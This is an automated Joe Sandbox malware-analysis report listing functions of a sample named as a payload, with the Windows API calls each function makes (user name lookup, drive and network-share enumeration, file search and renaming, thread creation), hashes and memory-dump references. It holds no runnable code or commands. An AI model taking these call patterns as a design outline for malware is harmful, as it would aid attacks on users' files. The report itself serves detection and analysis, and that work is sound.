                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2560635915-0
                                                                                                                                                                        • Opcode ID: 2ad88ba2d0e71f4c2d8602d1aee621e245cbaa05222ceeabbd2d93e1750b0f24
                                                                                                                                                                        • Instruction ID: a7c1dc31e8ba9757719430ebdd8afe677adb4b3ac0315f2405c692ac61028828
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ad88ba2d0e71f4c2d8602d1aee621e245cbaa05222ceeabbd2d93e1750b0f24
                                                                                                                                                                        • Instruction Fuzzy Hash: 61410D31218344DFC710DF68C885B2BFBE8BB89718F500A2CF586922A2D7B5C604CB93
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FB185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 002FB1BA
                                                                                                                                                                          • Part of subcall function 002F11C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 002F120F
                                                                                                                                                                          • Part of subcall function 002F11C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 002F1228
                                                                                                                                                                          • Part of subcall function 002F11C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F123D
                                                                                                                                                                          • Part of subcall function 002F11C0: MoveFileW.KERNEL32(00000000,?), ref: 002F1277
                                                                                                                                                                          • Part of subcall function 002FBA10: LoadCursorW.USER32(00000000,00007F00), ref: 002FBA4A
                                                                                                                                                                          • Part of subcall function 002FBA10: RegisterClassExW.USER32(00000030), ref: 002FBA73
                                                                                                                                                                          • Part of subcall function 002FBA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 002FBAAD
                                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FB4B3
                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 002FB4CD
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FB4D7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                                        • API String ID: 441990211-897913220
                                                                                                                                                                        • Opcode ID: a7f663b808875d0d8abbbcc83d62113e3a5856ceba6647525adbe6b8ce41b32e
                                                                                                                                                                        • Instruction ID: 57e2cd8d146057384e268786594f1ae4739e3ae9df112026228ccbdce0229c90
                                                                                                                                                                        • Opcode Fuzzy Hash: a7f663b808875d0d8abbbcc83d62113e3a5856ceba6647525adbe6b8ce41b32e
                                                                                                                                                                        • Instruction Fuzzy Hash: 455112715342499BC618FB60C9629FEF7A8AF95380F40493DF646431A2EF30962DCF92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EEF50 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EEF69
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EEF85
                                                                                                                                                                        • _memset.LIBCMT ref: 002EEF9B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$AllocateHeap_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3655941445-0
                                                                                                                                                                        • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                        • Instruction ID: 5726f822d8a6f3cf867aecdd3e7ca01e77d0184bde5d2266556ce10575bb0079
                                                                                                                                                                        • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C11A031500624AFCB10DFA8C881B5ABBB5FF8A310F6541A8E9489F396D631A912CB81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00303B4C Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00303B64
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00303B82
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00303B97
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3074076210-0
                                                                                                                                                                        • Opcode ID: c57e02fc5bdd825949673d1f604781b346195fd082f3b09fec6ab5e3d441bf09
                                                                                                                                                                        • Instruction ID: 9c66251cb67926c1cc0e03c83b9515dd81592625e7105c79d31ef354e1e6bb63
                                                                                                                                                                        • Opcode Fuzzy Hash: c57e02fc5bdd825949673d1f604781b346195fd082f3b09fec6ab5e3d441bf09
                                                                                                                                                                        • Instruction Fuzzy Hash: 0CF0283550120D66CF0BAAE8EC66EEEB7ACDF05354F104465FC14AA1C2DFF19A8082D4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00334C00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00334AE0: GetStdHandle.KERNEL32(000000F4,00334C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0033480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00331D37,00000000,002ECDAE,00000001,00000001), ref: 00334AFA
                                                                                                                                                                          • Part of subcall function 00334AE0: GetFileType.KERNEL32(00000000), ref: 00334B05
                                                                                                                                                                          • Part of subcall function 00334AE0: __vfwprintf_p.LIBCMT ref: 00334B27
                                                                                                                                                                        • _raise.LIBCMT ref: 00334C18
                                                                                                                                                                          • Part of subcall function 0030A12E: __getptd_noexit.LIBCMT ref: 0030A16B
                                                                                                                                                                          • Part of subcall function 00307CEC: _doexit.LIBCMT ref: 00307CF6
                                                                                                                                                                        Strings
                                                                                                                                                                        • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00334C0C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                                                                        • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                                                                        • API String ID: 2149077303-4210838268
                                                                                                                                                                        • Opcode ID: 0da791709155dff7194b212f50fee7a1975301956d4c648de84b05b7478b7519
                                                                                                                                                                        • Instruction ID: d952f93d0c2fad39b7dd23393ee676a2ddfadcbc12de8798d0083704f14de550
                                                                                                                                                                        • Opcode Fuzzy Hash: 0da791709155dff7194b212f50fee7a1975301956d4c648de84b05b7478b7519
                                                                                                                                                                        • Instruction Fuzzy Hash: 18D09E79589200BFE9076790AC17A4B7B55AF84714F408424F69A084F2D6729120A757
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EFD57 Relevance: 3.1, APIs: 2, Instructions: 134fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2799698630-0
                                                                                                                                                                        • Opcode ID: bfb1fadf7191ab26b11b13fdae4d769fcb6f5179d4eb8dc8a01bfa8843dac7a6
                                                                                                                                                                        • Instruction ID: 93cf018332b3f07c768e5f4dd1b30d77881ac628c2ea05820b9298a2c4ae7d13
                                                                                                                                                                        • Opcode Fuzzy Hash: bfb1fadf7191ab26b11b13fdae4d769fcb6f5179d4eb8dc8a01bfa8843dac7a6
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B51DE70C2029DCAEF61DF60CD457EEBAB5BF11308F4001B9D409A6291EB729AA4CF52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F18C5 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002F18DD
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 002F18E9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFreeHandleVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2443081362-0
                                                                                                                                                                        • Opcode ID: 8330051c5f3e2b46cce4ca8460e15a7bc8d15bad4297c3b16fbab069e4f8b15c
                                                                                                                                                                        • Instruction ID: cdc959484b9a130771485f0b3475d2ad09f0d238e19846d6a7bbe6151cbd4d9f
                                                                                                                                                                        • Opcode Fuzzy Hash: 8330051c5f3e2b46cce4ca8460e15a7bc8d15bad4297c3b16fbab069e4f8b15c
                                                                                                                                                                        • Instruction Fuzzy Hash: 82E08636A10508DBD721CF98ED807ACF374F786720F600369D919732D047312D118A44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F6950 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 002F69DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 120817956-0
                                                                                                                                                                        • Opcode ID: fc8fe6467c8c2daa87b57928029614aa587ed43a7fae3626feca2ffbd0bb7c05
                                                                                                                                                                        • Instruction ID: ad7829d9fe9ebfd4c442b98b0ebf644811b977b6ab7e6720360434fe159765ae
                                                                                                                                                                        • Opcode Fuzzy Hash: fc8fe6467c8c2daa87b57928029614aa587ed43a7fae3626feca2ffbd0bb7c05
                                                                                                                                                                        • Instruction Fuzzy Hash: 5031D471A1060A9FCB20DF68C89567EF7F8EB49750F20423DE956D7780DB709E148BA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F6570 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 002F65C5
                                                                                                                                                                          • Part of subcall function 00303B4C: _malloc.LIBCMT ref: 00303B64
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 657562460-0
                                                                                                                                                                        • Opcode ID: 57919c8703c58b342d6f3acc2e65f74f4f97d34892043d5d251430d9a5df5a5c
                                                                                                                                                                        • Instruction ID: 6def98fba5013c44609ab8edb4e7a1efd963c179d44afb5748e8598d97f28634
                                                                                                                                                                        • Opcode Fuzzy Hash: 57919c8703c58b342d6f3acc2e65f74f4f97d34892043d5d251430d9a5df5a5c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8921F47590051ADBCB14DF6CD981B6ABFA9EF45B50F048239E9059F348D730EA24CBE1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FFA10 Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 002FFA25
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                        • Opcode ID: 7db9df8efa5c5c9734c6803e874a72695b1e95e67c00fc6ee947c19fd0431bc2
                                                                                                                                                                        • Instruction ID: e35aa4113bd04a90b3b620d86f97e3152ace5de2b023a238558171f2b8925f36
                                                                                                                                                                        • Opcode Fuzzy Hash: 7db9df8efa5c5c9734c6803e874a72695b1e95e67c00fc6ee947c19fd0431bc2
                                                                                                                                                                        • Instruction Fuzzy Hash: 18D0A7323583147BE7140A99AC07F977ACCCF16B50F00403AB609DA1C0D9E1F8108A98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FFD80 Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002F0BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 002F0C12
                                                                                                                                                                        • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 002FFDA4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumMessageOpenSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1835186980-0
                                                                                                                                                                        • Opcode ID: b2173d9b2c520376c5ceb4e3f535ce2bfc9c8594a0f8d5ceb16ad0e93a327654
                                                                                                                                                                        • Instruction ID: 7ea6a6c68d0c685d39153c8e5001e3fc88b8875661e9e5f4e6e690e32720904b
